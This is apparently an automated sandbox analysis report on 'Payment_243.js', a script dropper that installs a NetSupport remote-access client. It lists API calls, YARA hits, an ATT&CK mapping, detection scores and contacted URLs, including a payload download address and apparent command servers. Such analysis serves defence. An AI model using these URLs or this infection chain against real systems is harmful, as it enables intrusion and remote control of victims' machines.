Code function: 4_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,

4_2_110B7F30

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 6_2_6A166C74 VirtualProtect ?,-00000001,00000104,?

6_2_6A166C74

Source: C:\ProgramData\x225qa0\client32.exe

4_2_11029BB0

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

4_2_1117D104

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	4_2_110934A0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,	4_2_11031780
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_11162BB7
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_1116EC49
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	6_2_6A0F0807
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A16ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,	6_2_6A16ADFC
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A16C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	6_2_6A16C16F
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_716638F7 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	6_2_716638F7

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: webmvorbisencoder.dll.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 45.155.249.215 80

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,

4_2_110F4990

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11113190 GetKeyState,DeviceIoControl,keybd_event,

4_2_11113190

Source: C:\Windows\System32\wscript.exe

Process created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe"

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

File opened: Windows Firewall: C:\Windows\SysWOW64\FirewallAPI.dll

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

4_2_1109E5B0

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

4_2_1109ED30

Source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Progman

Source: C:\ProgramData\x225qa0\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_11174B29
Source: C:\ProgramData\x225qa0\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	4_2_11174BCC
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoA,	4_2_1116C24E
Source: C:\ProgramData\x225qa0\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_11174796
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_111746A1
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_1117483D
Source: C:\ProgramData\x225qa0\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_11174898
Source: C:\ProgramData\x225qa0\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_11174B90
Source: C:\ProgramData\x225qa0\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_11174A69
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	6_2_6A0F888A
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,	6_2_6A0F86E3
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	6_2_6A0F871C
Source: C:\ProgramData\x225qa0\client32.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	6_2_6A0F8468
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	6_2_6A0F85AC
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	6_2_6A0F65F0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage,	6_2_6A16F307
Source: C:\ProgramData\x225qa0\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_6A16F3C7
Source: C:\ProgramData\x225qa0\client32.exe	Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,	6_2_6A16F034
Source: C:\ProgramData\x225qa0\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_6A16F0DB
Source: C:\ProgramData\x225qa0\client32.exe	Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage,	6_2_6A16F136
Source: C:\ProgramData\x225qa0\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_6A16F42E

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ProgramData\x225qa0.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

4_2_110F37A0

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

4_2_11134830

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_1103BA70 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,

4_2_1103BA70

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

4_2_1117594C

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11146010 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,

4_2_11146010

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,		4_2_11070430
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_71662710 CapiListen,memset,		6_2_71662710

Source: Yara match	File source: 6.2.client32.exe.73620000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.71660000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.71660000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.73620000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.71660000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.73620000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.715d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.670615184.000000000201E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 3748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 3908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 3992, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\x225qa0\client32.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\x225qa0\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\x225qa0\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\x225qa0\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\x225qa0\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\x225qa0\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	22 Scripting	1 DLL Side-Loading	2 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	4 Native API	1 DLL Side-Loading	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	2 Valid Accounts	21 Access Token Manipulation	5 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	1 Windows Service	1 Software Packing	NTDS	37 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	16 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	113 Process Injection	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 File Deletion	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	113 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment_243.js	3%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\x225qa0\HTCTL32.DLL	16%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\x225qa0\PCICHEK.DLL	18%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\x225qa0\PCICL32.DLL	18%	ReversingLabs	Win32.Trojan.NetSupport
C:\ProgramData\x225qa0\TCCTL32.DLL	5%	ReversingLabs
C:\ProgramData\x225qa0\client32.exe	32%	ReversingLabs	Win32.Trojan.NetSupport
C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\ProgramData\x225qa0\msvcr100.dll	0%	ReversingLabs
C:\ProgramData\x225qa0\pcicapi.dll	16%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\x225qa0\remcmdstub.exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\x225qa0\webmmux.dll	0%	ReversingLabs
C:\ProgramData\x225qa0\webmvorbisencoder.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.netsupportsoftware.com	0%	Avira URL Cloud	safe
http://0.30000000000000004.com/	0%	Avira URL Cloud	safe
http://%s/testpage.htm	0%	Avira URL Cloud	safe
https://jsbench.me/2vkpcekkvw/1)	0%	Avira URL Cloud	safe
http://%s/testpage.htmwininet.dll	0%	Avira URL Cloud	safe
http://127.0.0.1RESUMEPRINTING	0%	Avira URL Cloud	safe
http://www.pci.co.uk/supportsupport	0%	Avira URL Cloud	safe
http://www.pci.co.uk/support	0%	Avira URL Cloud	safe
http://45.155.249.215/xxx.zip?mt=6364	0%	Avira URL Cloud	safe
http://%s/fakeurl.htm	0%	Avira URL Cloud	safe
http://185.157.213.71/fakeurl.htm	0%	Avira URL Cloud	safe
http://www.netsupportschool.com/tutor-assistant.asp11(L	0%	Avira URL Cloud	safe
https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).	0%	Avira URL Cloud	safe
http://www.netsupportschool.com/tutor-assistant.asp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geo.netsupportsoftware.com	104.26.0.231	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geo.netsupportsoftware.com/location/loca.asp	false		high
http://45.155.249.215/xxx.zip?mt=6364	true	Avira URL Cloud: safe	unknown
http://185.157.213.71/fakeurl.htm	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.netsupportsoftware.com	client32.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Payment_243.js	false		high
http://www.pci.co.uk/support	client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://%s/testpage.htmwininet.dll	client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	false		high
http://www.pci.co.uk/supportsupport	client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	client32.exe.0.dr	false		high
http://127.0.0.1RESUMEPRINTING	client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
https://jsbench.me/2vkpcekkvw/1)	Payment_243.js	false	Avira URL Cloud: safe	unknown
